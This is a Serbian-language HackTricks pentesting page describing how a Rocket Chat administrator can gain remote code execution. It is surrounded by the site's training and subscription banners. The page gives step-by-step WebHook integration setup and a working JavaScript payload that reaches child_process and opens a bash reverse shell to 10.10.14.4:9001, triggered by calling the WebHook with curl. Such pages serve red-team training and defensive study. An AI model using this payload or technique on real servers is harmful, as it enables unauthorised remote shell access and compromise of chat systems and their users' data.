Rocket Chat
Reading time: 2 minutes
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
RCE
Ako ste administrator unutar Rocket Chat-a, možete dobiti RCE.
- Idite na
Integrations
i izaberiteNew Integration
i odaberite bilo koju:Incoming WebHook
iliOutgoing WebHook
. /admin/integrations/incoming
.png)
- Prema docs, oba koriste ES2015 / ECMAScript 6 (u suštini JavaScript) za obradu podataka. Dakle, hajde da dobijemo rev shell za javascript kao:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Konfigurišite WebHook (kanal i post kao korisničko ime moraju postojati):
.png)
- Konfigurišite WebHook skriptu:
.png)
- Sačuvajte promene
- Dobijte generisani WebHook URL:
.png)
- Pozovite ga sa curl i trebali biste primiti rev shell
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.